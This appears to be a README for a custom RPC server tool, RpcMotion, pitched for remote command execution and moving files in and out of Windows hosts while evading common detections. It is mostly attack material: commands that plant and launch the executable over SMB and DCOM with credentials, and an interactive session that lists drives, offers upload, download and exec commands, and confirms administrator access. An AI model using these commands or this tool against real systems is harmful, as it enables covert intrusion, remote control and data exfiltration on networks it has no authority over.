Execute commands, in/exfiltrate files using your custom RPC Server
This project demonstrates an example of a custom RPC server that you can use for your own purposes, potentially bypassing known detections of command execution via psexec, atexec, and others.
Check more details here
Deploy RPC Server as u wish. For example:
nxc smb office.local -u admin -p admin --put-file /root/RpcMotion.exe c:\rpcmotion.exe
impacket-dcomexec.py -nooutput admin:admin@10.10.10.10 "c:\rpcmotion.exe"
# or wmiexec. In the logs will be cmd.exe /Q /c c:\rpcmotion.exeThen connect and do pentest!
┌──(root㉿WIN-PC)-[~]
└─# python client.py --host office.local --port 12345 --interactive
Interactive RPC Shell (type 'help' for commands, 'exit' to quit)
RPC> ls
[+] Directory listing:
Directory listing:
[FILE] desktop.ini
[FILE] Process Hacker 2.lnk
[DIR] python-3.14.0a1-embed-amd64
[FILE] RpcMotion.exe
[DIR] test
RPC> ls c:\
[+] Directory listing:
Directory listing:
[DIR] $Recycle.Bin
[DIR] allaceess
[FILE] bootmgr
[FILE] BOOTNXT
[DIR] Documents and Settings
[DIR] Drivers
[DIR] ExchangeSetupLogs
[DIR] Logs
[FILE] pagefile.sys
[DIR] PerfLogs
[DIR] Program Files
[DIR] Program Files (x86)
[DIR] ProgramData
[DIR] Recovery
[DIR] System Volume Information
[DIR] temp
[DIR] Users
[DIR] Windows
RPC> help
Available commands:
help Show this help
exit, quit Exit shell
connect <host> <port> Connect to server
disconnect Disconnect from server
exec <command> Execute command with output
silent <command> Execute command without output
upload <local> <remote> Upload file to server
download <remote> <local> Download file from server
ls [path] List directory
shutdown Shutdown server
ping Ping server
status Show connection status
RPC> exec whoami
[+] Command output:
office\administrator
RPC> exit